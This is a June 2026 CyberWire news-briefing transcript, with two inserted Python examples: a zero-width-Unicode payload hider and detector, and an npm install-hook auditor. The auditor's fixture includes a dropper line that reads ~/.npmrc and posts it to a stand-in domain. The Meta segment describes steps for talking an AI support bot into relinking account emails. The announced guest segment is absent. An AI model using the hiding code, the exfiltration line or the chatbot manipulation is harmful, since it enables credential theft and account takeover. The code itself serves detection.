
The bugs are piling up faster than the fixes.
A federal watchdog questions NIST over its vulnerability database backlog. Google patches an Android zero-day. Citizen Lab exposes a powerful location-tracking platform. Malware hides commands in Steam comments. Researchers spot AI-assisted malware development. Attackers compromise Red Hat’s npm namespace. DriveSurge spreads malware through ClickFix and fake updates. FreePBX patches a critical flaw. And Dashlane responds to a brute-force attack. Our guest is Laure Lydon, Opening Chair for Infosecurity Europe and VP of Security and Infrastructure, Flo Health, sharing her expertise on digital health platforms. Meta’s AI support bot proves a bit too eager to help.
Today is Tuesday, June 2nd, 2026. I’m Dave Bittner. And this is your CyberWire Intel Briefing.
A federal watchdog finds NIST failures undermining critical cybersecurity vulnerability tracking.
NIST’s National Vulnerability Database (NVD), a critical resource used by government and industry to prioritize cybersecurity vulnerabilities, has become increasingly ineffective due to management failures, according to a Department of Commerce inspector general report. The backlog of unprocessed vulnerabilities more than doubled from 13,000 in February 2024 to over 27,000 by the end of 2025, undermining the database’s usefulness and public confidence.
The report attributes the crisis largely to poor planning after NIST stopped funding contractors who process vulnerability data. Although NIST promised to resolve the backlog by September 2024, it lacked a realistic strategy to meet its processing targets. The watchdog also found significant duplication of effort between NIST and CISA, including more than 21,000 overlapping vulnerability reviews and roughly $200,000 in wasted spending.
Additional concerns included weak communication with stakeholders and inefficient severity-scoring practices that often duplicated work already performed elsewhere. The inspector general recommended stronger coordination with CISA, reduced emphasis on vulnerability scoring, improved stakeholder engagement, and a sustainable plan to eliminate the backlog. NIST agreed with the recommendations and said it would begin implementing improvements immediately.
Google patches an Android zero-day.
Google’s June 2026 Android security updates patch 124 vulnerabilities, including a high-severity zero-day, CVE-2025-48595, that has been exploited in limited, targeted attacks. The flaw affects Android 14 and later, allowing local attackers to execute code and escalate privileges. Google also fixed 18 critical vulnerabilities across Android system components, including flaws that could enable privilege escalation without user interaction. While Pixel devices will receive updates immediately, other Android vendors may take longer to deploy patches. Google urged users to install the latest Android updates as soon as they become available.
Citizen Lab highlights a powerful geolocation surveillance platform.
A new report from Citizen Lab examines Webloc, a geolocation surveillance platform developed by Cobwebs Technologies and now sold by Penlink. The system uses location and advertising data collected from consumer mobile apps to track hundreds of millions of devices worldwide. According to the report, Webloc provides access to continuously updated records that can reveal sensitive details about individuals, including home and work locations, social relationships, religious affiliations, political views, and health-related activities. Researchers found evidence that the technology is used by law enforcement, intelligence, and military organizations in multiple countries, including the United States, Hungary, and El Salvador. The report also highlights concerns about limited transparency, oversight, and the potential for warrantless surveillance. Citizen Lab argues that the growing use of advertising-derived data for government surveillance illustrates how commercial data collection ecosystems can be repurposed for large-scale monitoring, raising significant privacy and civil liberties concerns.
New malware hides instructions inside Steam Community profile comments.
Researchers at GoDaddy uncovered a malware campaign affecting roughly 2,000 WordPress sites that uses an unusual command-and-control technique: hiding instructions inside Steam Community profile comments. The comments appear as harmless ASCII art, but invisible Unicode characters encode malicious payloads that infected sites decode to retrieve commands and download additional malware.
The campaign ultimately loads a disguised JavaScript file from a malicious domain and installs a persistent PHP backdoor. That backdoor allows attackers to remotely update malicious code across WordPress themes and plugins, making infections difficult to fully remove. The malware also uses multiple layers of obfuscation, including encryption, encoded strings, and legitimate WordPress functions to evade detection.
Researchers believe the initial compromise likely stems from stolen credentials, vulnerable plugins, or other common WordPress attack vectors. The campaign demonstrates how threat actors are increasingly abusing trusted platforms and unconventional techniques to conceal command-and-control infrastructure and maintain long-term access to compromised websites.
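The Steam-comment technique described above, as an added example that is not GoDaddy's code or the campaign's own: the page says the comments look like ASCII art while invisible Unicode characters carry the payload, but it does not describe the encoding. The bit scheme below (U+200B for 0, U+200C for 1, eight bits per byte, hidden characters spread between the characters of the cover art) is an assumption chosen for illustration. The detection side does not depend on that assumption: it flags any run of format-control or zero-width characters, which is what a scanner looking at profile comments or at text a WordPress plugin fetches from the web would actually do. The cover art and the hidden command are constructed sample data.

```python
"""Detect and decode payloads hidden in invisible Unicode characters.

Added example, not the campaign's or GoDaddy's code. The encoding scheme
(ZERO WIDTH SPACE = 0, ZERO WIDTH NON-JOINER = 1) is an assumption for
illustration; the detector flags invisible characters regardless of scheme.
"""
import unicodedata

# Characters that render as nothing in most UIs. Anything else in Unicode
# category Cf (format controls, including bidi overrides) is treated the same.
INVISIBLE = {
    "\u200b": "ZERO WIDTH SPACE",
    "\u200c": "ZERO WIDTH NON-JOINER",
    "\u200d": "ZERO WIDTH JOINER",
    "\u2060": "WORD JOINER",
    "\ufeff": "ZERO WIDTH NO-BREAK SPACE",
}

# Assumed toy encoding: one bit per hidden character.
BIT0, BIT1 = "\u200b", "\u200c"


def _is_invisible(ch: str) -> bool:
    return ch in INVISIBLE or unicodedata.category(ch) == "Cf"


def hide(payload: bytes, cover: str) -> str:
    """Spread the payload's bits, as invisible characters, across the cover text."""
    if not cover:
        raise ValueError("cover text must not be empty")
    bits = "".join(f"{b:08b}" for b in payload)
    hidden = [BIT1 if bit == "1" else BIT0 for bit in bits]
    per_char = -(-len(hidden) // len(cover))  # ceiling division
    out = []
    for i, ch in enumerate(cover):
        out.append(ch)
        # keep the hidden characters in payload order so extraction is a plain scan
        out.extend(hidden[i * per_char:(i + 1) * per_char])
    return "".join(out)


def find_invisible(text: str) -> list:
    """Return (offset, character name) for every invisible character, any scheme."""
    return [
        (i, INVISIBLE.get(ch) or unicodedata.name(ch, "UNKNOWN"))
        for i, ch in enumerate(text)
        if _is_invisible(ch)
    ]


def visible(text: str) -> str:
    """What a human sees: the text with every invisible character stripped."""
    return "".join(ch for ch in text if not _is_invisible(ch))


def extract(text: str) -> bytes:
    """Decode the assumed scheme: collect BIT0/BIT1 in order, 8 bits per byte."""
    bits = "".join("1" if ch == BIT1 else "0" for ch in text if ch in (BIT0, BIT1))
    bits = bits[: len(bits) - len(bits) % 8]
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def suspicious(text: str, threshold: int = 8) -> bool:
    """Scanner heuristic: a short comment carrying many invisible characters
    is a red flag even when its visible part is harmless ASCII art."""
    return len(find_invisible(text)) > threshold


# Constructed sample: a harmless-looking banner carrying a hidden command
# pointing at a reserved, non-routable example domain.
COVER = "  ___  \n / _ \\ \n| | | |\n \\___/ \n"
HIDDEN_COMMAND = b"FETCH https://example.invalid/x.js"
SAMPLE = hide(HIDDEN_COMMAND, COVER)

if __name__ == "__main__":
    print("visible text unchanged:", visible(SAMPLE) == COVER)
    print("invisible characters :", len(find_invisible(SAMPLE)))
    print("decoded payload      :", extract(SAMPLE))
```

Run it against anything your site pulls from a third-party profile or comment feed; the useful signal in practice is `find_invisible` and `suspicious`, since an attacker's real scheme will not match the toy one here, but cannot avoid leaving format-control characters in the text.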
Researchers track a threat actor using AI coding tools to evade EDR.
Sophos researchers discovered a threat actor using AI coding tools to develop and refine malware designed to evade endpoint detection and response (EDR) products from multiple vendors. The activity appeared in a testing lab containing AI-assisted Python scripts, many written in Russian, and tools for building stealthy malware loaders. Sophos emphasized that AI was not acting autonomously or embedded in the malware. Instead, human operators used AI to accelerate coding, testing, and research. Although the project was presented as a red team exercise, Sophos assessed it was likely intended for real-world post-exploitation activity and linked to ransomware and data theft operations.
Attackers hijack Red Hat’s npm namespace to distribute backdoored software.
Attackers briefly hijacked Red Hat’s official npm namespace to distribute backdoored versions of 32 trusted software packages used across the company’s Hybrid Cloud Console ecosystem. According to researchers at ReversingLabs and Aikido Security, the malicious packages contained hidden preinstall scripts that executed automatically during installation, stealing cloud credentials, CI/CD tokens, npm credentials, and other sensitive data. The malware, identified as a variant of the Mini Shai-Hulud worm, also attempted to spread by using stolen publishing credentials to compromise additional packages. Investigators believe the attackers breached a GitHub Actions build pipeline and abused trusted publishing mechanisms based on OIDC tokens. Red Hat has since removed the malicious releases and published clean versions, but organizations that installed affected packages are advised to rotate credentials and review their development pipelines for signs of compromise.
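The mechanism in the Red Hat story, preinstall scripts that run automatically and read tokens off the build host, is something a defender can look for in an installed tree before the next install runs them. The audit below is an added example, not tooling from Red Hat, ReversingLabs or Aikido Security. It builds a constructed, fake node_modules tree in a temporary directory so it runs offline; every package name, script body and domain in it is made up. The list of "secret hints" is illustrative, not a published detection rule.

```python
"""Audit a node_modules tree for packages that execute code at install time.

Added example, not Red Hat's or the researchers' tooling. run_demo() builds a
constructed fixture in a temp directory; audit() can be pointed at a real tree.
"""
import json
import re
import tempfile
from pathlib import Path

# npm runs these hooks automatically on install unless --ignore-scripts is set.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")

# Illustrative strings that rarely belong in an install script and often do in a
# credential stealer: token files, CI/OIDC environment variables, exfil helpers.
SECRET_HINTS = re.compile(
    r"(\.npmrc|NPM_TOKEN|GITHUB_TOKEN|ACTIONS_ID_TOKEN_REQUEST|AWS_SECRET"
    r"|\.aws/credentials|\.config/gcloud|\.kube/config|curl\s|wget\s|fetch\(|base64)",
    re.IGNORECASE,
)


def _is_package_root(pkg_json: Path) -> bool:
    """Only node_modules/<name>/package.json or node_modules/@scope/<name>/package.json."""
    parent = pkg_json.parent.parent
    if parent.name == "node_modules":
        return True
    return parent.name.startswith("@") and parent.parent.name == "node_modules"


def _referenced_script(pkg_dir: Path, cmd: str) -> str:
    """If the hook runs a JS file shipped inside the package, return its text."""
    m = re.search(r"\bnode\s+([\w./-]+\.js)", cmd)
    if not m:
        return ""
    try:
        return (pkg_dir / m.group(1)).read_text(encoding="utf-8", errors="replace")
    except OSError:
        return ""


def audit(node_modules: Path) -> list:
    findings = []
    for pkg_json in sorted(node_modules.rglob("package.json")):
        if not _is_package_root(pkg_json):
            continue
        try:
            meta = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (ValueError, OSError):
            continue
        scripts = meta.get("scripts") or {}
        for hook in LIFECYCLE:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            body = _referenced_script(pkg_json.parent, cmd)
            hints = sorted({h.lower() for h in SECRET_HINTS.findall(cmd + "\n" + body)})
            findings.append({
                "package": meta.get("name", pkg_json.parent.name),
                "version": meta.get("version", "?"),
                "hook": hook,
                "command": cmd,
                "secret_hints": hints,
                "risk": "high" if hints else "review",
            })
    return findings


def build_fixture(root: Path) -> Path:
    """Constructed tree: one trojanized-looking scoped package, one clean
    package, one legitimate native build (install hook without secret hints)."""
    nm = root / "node_modules"
    packages = {
        "@example-org/console-ui": {"name": "@example-org/console-ui", "version": "3.4.1",
                                    "scripts": {"preinstall": "node setup_bundle.js"}},
        "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0"},
        "native-thing": {"name": "native-thing", "version": "2.0.0",
                         "scripts": {"install": "node-gyp rebuild"}},
    }
    for rel, meta in packages.items():
        d = nm / rel
        d.mkdir(parents=True)
        (d / "package.json").write_text(json.dumps(meta), encoding="utf-8")
    # constructed dropper: reads the npm token file and posts it to a fake domain
    (nm / "@example-org/console-ui/setup_bundle.js").write_text(
        'const fs=require("fs");const t=fs.readFileSync(process.env.HOME+"/.npmrc");'
        'fetch("https://example.invalid/c",{method:"POST",body:t});',
        encoding="utf-8",
    )
    return nm


def run_demo() -> list:
    return audit(build_fixture(Path(tempfile.mkdtemp())))


if __name__ == "__main__":
    import sys
    results = audit(Path(sys.argv[1])) if len(sys.argv) > 1 else run_demo()
    for r in results:
        print(f"[{r['risk']}] {r['package']}@{r['version']} {r['hook']}: "
              f"{r['command']} {r['secret_hints']}")
```

The "review" tier exists because install hooks are not inherently malicious (native modules legitimately rebuild on install); the point is to see them before they run. The corresponding preventive control in CI is installing with `npm ci --ignore-scripts` and enabling hooks only for the packages that need them, alongside the credential rotation the story recommends.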
DriveSurge uses ClickFix and FakeUpdates to spread malware.
Researchers at Silent Push have identified a large-scale malware distribution operation by a threat actor known as DriveSurge, which uses compromised websites to redirect visitors to malicious infrastructure. The campaign relies on two common social engineering techniques: ClickFix, which tricks users into running malicious commands, and FakeUpdates, which impersonates browser update prompts to deliver malware. DriveSurge appears to operate as an initial access broker, using a pay-per-install model to provide footholds for other cybercriminals. Visitors are funneled through a traffic distribution system called zTDS, which determines the most effective lure for each target. Researchers linked thousands of compromised sites and more than 80 malicious domains to the campaign. The operation targets both Windows and macOS users, highlighting the growing scale and sophistication of malware delivery through trusted websites.
FreePBX finds a critical vulnerability affecting its User Control Panel.
FreePBX has disclosed a critical vulnerability, CVE-2026-46376, that could allow unauthenticated attackers to access the User Control Panel through hard-coded credentials in the userman module. The flaw affects FreePBX versions 15.0.42 through 16.0.44 and 17.0.1 through 17.0.6 when the optional generic template setup is used. Successful exploitation could expose sensitive communications data and enable unauthorized changes to user settings. Administrators should update to userman versions 16.0.45 or 17.0.7, restrict management interfaces to trusted networks or VPN access, and enable multi-factor authentication or SAML to strengthen account security.
Dashlane suffers a brute-force attack.
Dashlane says a recent wave of account suspensions was triggered by automated defenses responding to brute-force login attacks. Affected users received alerts about login attempts and device registration requests from unfamiliar locations, leading some to suspect a phishing campaign. Dashlane confirmed the activity was caused by external attackers attempting to guess passwords and said the platform automatically locked targeted accounts to prevent unauthorized access. The company reported no evidence that its systems were compromised and has since restored affected accounts. While Dashlane marked the incident as resolved, some users have continued to report login issues and difficulties reaching support.
Meta’s AI support bot proves a bit too eager to help.
Hackers claim they found an unexpectedly cooperative accomplice in Meta’s AI support chatbot. According to reports and videos shared in Telegram channels, attackers were able to take over Instagram accounts by persuading the AI support system to change the email address associated with a target profile. The process allegedly involved matching the victim’s region with a VPN, initiating a password reset, and then asking the chatbot to link a new email address. Once the AI complied, the attacker received reset codes and gained control of the account.
The alleged exploit coincided with a string of high-profile Instagram takeovers, including accounts linked to the Obama White House, the U.S. Space Force, and Sephora. Researchers and victims say the incident highlights a growing challenge with AI-driven support systems: when something goes wrong, there may be no human available to intervene.
In a touch of irony, Meta had recently promoted its AI support tools as a way to improve account security and prevent takeovers. Meta says the issue has now been fixed and that affected accounts are being secured. Still, the episode serves as a reminder that replacing human judgment with automation can sometimes produce results no one intended, except perhaps the attackers.
And that’s the CyberWire.
For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.
And that’s the CyberWire Daily, brought to you by N2K CyberWire.
We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com.
We’re proud that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.
N2K helps cybersecurity professionals and organizations grow, learn, and stay ahead. We’re the nexus for discovering the people, tech, and ideas shaping the industry. Learn how at n2k.com.
N2K’s lead producer is Liz Stokes. We’re mixed by Tré Hester, with original music and sound design by Elliott Peltzman. Our contributing host is Maria Varmazis. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher. And I’m Dave Bittner. Thanks for listening.
